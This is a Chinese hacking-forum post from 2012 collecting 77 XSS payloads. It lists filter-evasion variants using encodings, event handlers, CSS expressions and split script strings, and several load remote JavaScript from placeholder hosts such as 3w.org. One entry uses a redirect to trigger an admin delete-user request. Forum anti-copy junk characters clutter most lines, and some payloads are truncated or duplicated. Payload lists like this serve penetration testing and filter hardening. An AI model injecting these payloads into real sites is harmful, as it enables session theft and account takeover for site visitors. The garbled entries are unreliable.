找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3537|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。" W  z! s% [% l: r3 M$ A- W
0 Y1 V: n0 N) }  b6 q7 K5 `
(1)普通的XSS JavaScript注入9 J6 X5 ~) G* Z9 ?/ V$ r9 `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
' I& h$ K5 M. J# J7 m' C
4 K3 \( L8 a: C (2)IMG标签XSS使用JavaScript命令
: @' i2 d' n) q* d% ~& V$ J <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- \( i) f) N) ~8 @; p
  a+ G" {) T6 M7 \
(3)IMG标签无分号无引号6 }, k7 S, v/ P$ N% Y2 {
<IMG SRC=javascript:alert(‘XSS’)>) \, e; m" w0 ?& C! [! ]7 q1 q

* O1 }9 ?! K  c% a" }( ]7 C, w (4)IMG标签大小写不敏感9 e/ _/ X3 e; Y4 s: W
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>1 E& O. e) V0 z  O" b
' [' G, J8 F* d' {+ R. v8 A: x3 t
(5)HTML编码(必须有分号)
) a) @4 Q" b* O. ` <IMG SRC=javascript:alert(“XSS”)>. z1 M  {2 t+ H/ k& f
: [4 M  Z) ~! A9 K* E# k& t
(6)修正缺陷IMG标签
1 I. B: ^1 K& V) U- U* u& D <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 o+ U; i: a' N; I- w- a) p
  o6 u! t' t1 Y/ _+ [% r. z4 S( J
(7)formCharCode标签(计算器)
& F1 U3 z( ^# R! y- ~8 O) k- o: m <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>. x. d5 Y1 {* L: M* J) {
; T! U, W) [( \% \" l. A% u; a* \1 |
(8)UTF-8的Unicode编码(计算器)& `9 ~* \! {  c5 R! i+ S% ~
<IMG SRC=jav..省略..S')>
8 A  N& p0 k7 U( r# a
2 p+ s2 F6 [0 P/ M& `6 T (9)7位的UTF-8的Unicode编码是没有分号的(计算器)3 y" ?0 n6 N; q! R4 X
<IMG SRC=jav..省略..S')>
: A  e: l/ Z1 F, U
3 D0 P* ^" L; t* ?5 \ (10)十六进制编码也是没有分号(计算器)1 u( P7 W+ u/ U: d( `# T* T6 b5 G+ l
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>7 \) [% r0 I( w* D' m: a* M
, m+ f; s% K" P
(11)嵌入式标签,将Javascript分开
5 {% [5 t: Q/ y  c( w" Z <IMG SRC=”jav ascript:alert(‘XSS’);”>7 s5 q, m$ K! u3 a7 ~
2 e% C8 k9 a4 n) Q$ j" y
(12)嵌入式编码标签,将Javascript分开! O* c$ h8 N% f# i' k  d' h  M
<IMG SRC=”jav ascript:alert(‘XSS’);”>
* s' I& `$ B1 D& e) f
* V. U/ m7 f; k2 c0 ?* C3 M (13)嵌入式换行符
- Y* d  q9 U  f8 a7 j0 u2 n/ c <IMG SRC=”jav ascript:alert(‘XSS’);”>
! _# E; l  @. j" R; g1 ^% y- o$ C8 Z7 s- r
(14)嵌入式回车3 B5 v; X1 _% l5 l& w) J
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ h# w5 i/ r; ~
/ e% B$ r% Z- e  |* a (15)嵌入式多行注入JavaScript,这是XSS极端的例子& h/ z( C1 }7 s$ j# a
<IMG SRC=”javascript:alert(‘XSS‘)”>
) ~( d3 M/ F6 Z' v& i" N
+ S4 y& Q1 |- c. n9 o, @' z1 N8 }8 i (16)解决限制字符(要求同页面)' t2 G" K' {4 Y0 [. c
<script>z=’document.’</script>
, A  `  a/ A: _! H; R# }' d <script>z=z+’write(“‘</script>
  r& h* O% L/ y1 U$ ]' N1 o <script>z=z+’<script’</script># h1 ]/ ?. N$ m  u
<script>z=z+’ src=ht’</script>
/ c4 X1 s; w' r <script>z=z+’tp://ww’</script>
6 K2 b* y/ q* h+ |; _4 w9 } <script>z=z+’w.shell’</script>
+ }6 M+ q# R+ z& K <script>z=z+’.net/1.’</script>
8 l4 [# M( l* ]9 _: t7 d' v' E <script>z=z+’js></sc’</script>5 [6 u$ J$ |9 w& {( N* p8 M& c
<script>z=z+’ript>”)’</script># S" o& k8 o) P" D5 A9 V
<script>eval_r(z)</script>! e* X$ Z5 W& L- C. [

4 P+ b: p+ i1 I  \2 q0 q (17)空字符
9 }  O! B" ^' u$ S8 T2 ?. n3 w perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" W3 F9 I) @3 c$ U" D5 h
7 a- B. @3 K2 u& i' b (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* E7 }' \, B! f7 z% x' w perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* D: D* _* |% F/ P4 _3 }, f4 l4 P
0 w, Z# m% _, Q8 r
(19)Spaces和meta前的IMG标签( n& w! H. K! l# ~- ~
<IMG SRC=”   javascript:alert(‘XSS’);”>
' _) [) L* z9 y! l# D, ]8 Z
( Y$ I7 Q9 {$ S) Q, a (20)Non-alpha-non-digit XSS
; l' w  [+ ~" h. c8 t3 P <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ @/ v( R$ I) ]7 A+ i- w5 k- R9 v, ?& _4 b6 k1 f4 [
(21)Non-alpha-non-digit XSS to 2
( m! E, H  j, f$ E* k <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>: v+ w# c; G1 o0 x6 u' R9 O6 |. a! x
* c/ |; T5 [9 w4 `% G
(22)Non-alpha-non-digit XSS to 3
( y1 ^& i) D' [; |; F% `+ ]) X, i <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) l7 ~7 ?1 W3 o$ E9 W, {! y: K
; @% T; N; a4 B4 T9 f) Q( C8 x. Z (23)双开括号  l7 j% A6 m! l
<<SCRIPT>alert(“XSS”);//<</SCRIPT># u5 p6 G/ R& u( n7 J

. c) [/ f% a2 k9 h8 l6 M! K (24)无结束脚本标记(仅火狐等浏览器)- U$ W( y3 p0 s1 ?7 V) s
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% {9 _" `; s2 T: S/ v8 }# ?8 [' L4 g5 P1 ~' A) A/ B/ x
(25)无结束脚本标记21 ]- A) D( I, a1 E
<SCRIPT SRC=//3w.org/XSS/xss.js>9 X! u4 q4 |0 Q. a

0 h% T% s# J; y (26)半开的HTML/JavaScript XSS+ p$ E6 {5 |: [, b% ~
<IMG SRC=”javascript:alert(‘XSS’)”
. a) D% ?9 x7 Y9 S4 Y8 _: l- m/ A" W' T# [1 L" E
(27)双开角括号8 Y6 Q$ |4 k4 ^2 @9 j" C, K5 x8 O0 o! F
<iframe src=http://3w.org/XSS.html <
# H2 y5 k9 _" H# I/ q
4 Z2 P) P& w1 K (28)无单引号 双引号 分号5 Y- |4 p1 j2 b1 l  P
<SCRIPT>a=/XSS/
6 W+ O6 w6 j& a' q2 w6 | alert(a.source)</SCRIPT># j$ F6 l: L% k9 Q# j( b) u5 h
1 \' G, x, x" R" F; u7 F6 k
(29)换码过滤的JavaScript8 T: j9 d' F1 S$ n
\”;alert(‘XSS’);//) U6 x" G( y0 Y& e( j9 S

7 q8 x. ^; W% q+ F; m" x1 | (30)结束Title标签
/ J3 K- i5 v, m2 I6 Y </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>8 u+ N8 Q8 o' n
/ k  S( C6 ^: \8 K
(31)Input Image* ]8 G% k' `7 d, Z4 |
<INPUT SRC=”javascript:alert(‘XSS’);”>
! h$ d% I. K: ^8 b4 V; d9 T) S- I# ]! ]
(32)BODY Image& w  S( s+ y5 w4 I* K
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>! n$ ^* e) b; w

' a) F( y. i5 y3 t! C9 U (33)BODY标签
5 F9 g: \$ [% H5 w1 }( P4 H <BODY(‘XSS’)>1 G  K/ z( O. `  ]; c! c/ q
5 S) `/ x# d, E" X) z
(34)IMG Dynsrc
5 v: F% l% A5 C! G. |- ~4 a <IMG DYNSRC=”javascript:alert(‘XSS’)”>1 V% B0 M. J& ~# G7 \+ \4 H, Y
' o3 p2 J. n+ C7 Y# D
(35)IMG Lowsrc
/ l& x! r: C  o# D0 w/ r; S <IMG LOWSRC=”javascript:alert(‘XSS’)”>
$ Q9 d( i8 H& d, O9 @+ l, s% S' y7 m8 D3 ^, F" M
(36)BGSOUND
) P+ K+ U. d/ Y <BGSOUND SRC=”javascript:alert(‘XSS’);”>
6 V. A- b' F# v" f, n- B+ m5 H5 w9 Y" e+ }( p3 m5 u* H# G
(37)STYLE sheet
5 a+ q: k# R: H! B/ p <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) P" y- X; ?2 L, h/ r9 F
) G: [: D9 M( t7 W, j+ C (38)远程样式表  }, V/ o/ ]" x2 d
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
4 _1 A  a4 M- @. M
& W$ Q" }4 R+ m( D- u. | (39)List-style-image(列表式)* H: c2 c$ o2 a9 A
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS0 k# q6 }- f! l5 l& D; F& d

7 ?9 s$ u5 d. @1 |  g, | (40)IMG VBscript, _4 A+ o* Z3 \$ S5 h9 A9 M! p
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 g$ o. W% L* N% [! f
# ]; v) n! K! p. l& T- ? (41)META链接url; N  K+ m5 e8 d# D: G1 B3 |( c
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- K9 ^! K) U/ c7 G# {  \5 s3 s
/ j6 o3 ~; ~# R (42)Iframe
4 a5 ?2 E3 a$ i- ]2 w' L' H" ` <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
4 O1 |2 `% o, q4 a! G2 }* V) h. f  y( ], @+ v- G1 K8 j
(43)Frame7 R2 G/ p/ R+ Y3 n2 \" F( h
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
0 R0 n* q# a6 a$ s, Z. s6 W: S% l) N( {, e7 K" F3 Z( }
(44)Table
; X% c" @, h- v/ W <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- o) W& W  u/ e, g$ B3 y* S
, p. R+ l9 R8 n3 E8 c9 H' G (45)TD; m( M0 b3 N. B7 j% X0 c
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 b% q' D% n+ {0 d- c* ?* j4 e3 k0 N& j6 g" K
(46)DIV background-image
+ v- G% |/ b& I' {: A <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. ~' D% K: v  F8 O
' d& Q: c/ F- |, F
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
7 }( z  a/ ~, O  ~; M: S3 h <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
  K9 c, A  v3 n6 v
. S' Z: d  o' A (48)DIV expression
  g! C% I1 g+ z <DIV STYLE=”width: expression_r(alert(‘XSS’));”>! d2 D$ f% l2 Y& t

- o  ]/ ~5 ], W4 s* v; C$ l* q8 B (49)STYLE属性分拆表达5 I$ \: m1 T7 Z# R- S
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>. `% B9 \$ Q  L- q7 {- K8 e

5 H) ]- q) s5 L% n' `9 v (50)匿名STYLE(组成:开角号和一个字母开头)6 G5 i  h6 l' ^) A1 ?# [" y9 ?
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
- O, ]. c( J; j. j8 a, a1 C& B, a; t
(51)STYLE background-image: c1 E; Y) p4 S" H5 p& @# h* B
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>' ]/ k3 H/ C) P4 C8 C

! Y; u! \: ^0 G+ w9 r (52)IMG STYLE方式
1 J0 J# N/ ?" e4 \ exppression(alert(“XSS”))’>- m" ?5 U- H3 Z- k: J+ {3 L. x
! X1 A4 M" u8 a" _0 Z2 I% {9 I6 V$ s
(53)STYLE background
/ k3 d$ @5 ?; r% E" v! i& x <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
, f( _. O+ g/ g7 K
# d, N0 _  c2 I; A  E$ N (54)BASE( o# L5 V! k; P, e5 k
<BASE HREF=”javascript:alert(‘XSS’);//”>
% e; E9 R# o( s
, S' s2 L: U5 w+ V, a8 _ (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
+ \4 j' Q8 c0 a0 g# V5 M <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>4 U; g6 \8 v( T8 V. w: k0 w0 Z# X

' e' a# @$ c* l2 @3 A (56)在flash中使用ActionScrpt可以混进你XSS的代码6 X& v; }, g0 D6 J; p, Q; q$ ?
a=”get”;
2 t. g! E2 l. a2 a1 { b=”URL(\”";
  Y/ c8 o; e) L2 O c=”javascript:”;/ O* A: |1 }! Q5 W2 i! w( U/ M
d=”alert(‘XSS’);\”)”;
% X0 l9 d+ h, L4 [8 b) a  A eval_r(a+b+c+d);
0 _5 ?4 t' |! g
- c' d2 n3 Q4 Q6 z (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上. V. q3 K, V' v  ^2 K8 y" f; `
<HTML xmlns:xss>' P3 t" }+ F4 ?$ m+ ]: {
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>0 i5 W( g9 J( _& N
<xss:xss>XSS</xss:xss>
" D* b+ c5 X$ g( E; ] </HTML>
, x7 m3 x3 b& B) d, Z5 N; s- z% I* R/ R) U6 [6 D/ W
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用$ N- y5 f& j* b3 m
<SCRIPT SRC=””></SCRIPT>
9 [( K  O6 @. `' L) m
- o0 g- m* B4 G  |$ P (59)IMG嵌入式命令,可执行任意命令7 t, j) @* W" V5 \% t) }
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
4 S! u- j! u& I0 R4 u1 C; v
+ ^3 i" U2 F. J! Z7 | (60)IMG嵌入式命令(a.jpg在同服务器)
$ t) m4 u+ R; `+ W6 \: ^, ^ Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& O8 r6 r; @) P7 g6 E4 H  }, g! j3 ^3 X# S6 ?
(61)绕符号过滤) z5 B  c5 n# N4 {
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
' q+ V* @4 I& N! B, z( p" E/ `: Q
(62)7 H' d/ Z: w9 q. |5 f; W' o' s
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>  ]$ V7 E+ Q! b+ f4 [
: ~' F! t+ m6 ^! J+ O( B
(63)
& Y. Q. q, t$ M$ }2 R <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>- r& O; f: Y" L

' }5 _. T! S# L; l (64)
  P$ \" G. _' e1 K1 d3 i1 k9 I) d <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 Z7 G# z& W$ j
. l" ~4 ?5 a/ l; Y (65)
. O" G- D8 H, ~1 w5 D <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT># Z3 y, y' b4 G* a
* Q3 M) \' T. q0 J
(66)
9 D4 c" d( y' c4 v <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 m' ]" b3 l% h4 m& l) I& C, c% S3 ], j# P6 @1 R. k
(67)8 c0 E9 b0 F$ `4 K7 N2 L
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
' K) x6 E$ O+ Z" k
7 v/ R4 o" R% G2 Z/ v! d, ?/ g) O (68)URL绕行
$ u: Q% d% w3 d+ k* M0 |' Z3 }  y <A HREF=”http://127.0.0.1/”>XSS</A>) c; M) h6 s5 ?6 c/ ~4 ^0 X

$ g, z+ [, W1 _/ Y (69)URL编码; P" W3 W( x9 [; F
<A HREF=”http://3w.org”>XSS</A>
% h1 R* r3 e, G+ O1 R+ j: B9 R
0 L. t& ]4 F% h3 |' n9 n7 v( J (70)IP十进制: ]* L: f" U/ S) P! t% q3 o
<A HREF=”http://3232235521″>XSS</A>/ S2 ~) B4 d$ s: W- X3 o* ?
4 I8 X8 }4 \* Z1 q' `2 O- ~
(71)IP十六进制5 d( g9 Y0 W% x) @2 d: j
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
/ @5 x: G4 [! \
  }. U. y" ^+ m" V, t( s. { (72)IP八进制' \% C: }+ c7 x5 Z( K5 ~
<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ a3 |) z! [9 A# p+ F1 W3 Z5 [
3 j% K8 q8 ^- `: ^( q% J7 q
(73)混合编码5 v* U, w7 J6 B, i; S; o: D
<A HREF=”h; _) Z. ~! A3 e0 S' v
tt p://6 6.000146.0×7.147/”">XSS</A>9 ]6 q6 u: Z/ q* H2 B8 q, s* d

; z' x, M" [( \/ n (74)节省[http:]
- g4 m) X4 x. R9 c <A HREF=”//www.google.com/”>XSS</A>
4 F) j& A: L. ~6 v
5 }0 G$ U2 _! ^# k& ?/ Q8 T9 f$ Q (75)节省[www]/ G% O1 @3 `% Q9 L
<A HREF=”http://google.com/”>XSS</A>6 H" R4 K7 d: b# l

) H0 B. c' E/ B( C' a (76)绝对点绝对DNS( a6 i' ]% P5 {' Q- `1 L
<A HREF=”http://www.google.com./”>XSS</A># K0 V% X) y; B2 K

+ u7 J8 o# T- |0 ^- S7 ?8 E' C (77)javascript链接
* p1 i% J. W2 {; ~9 Q6 v <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表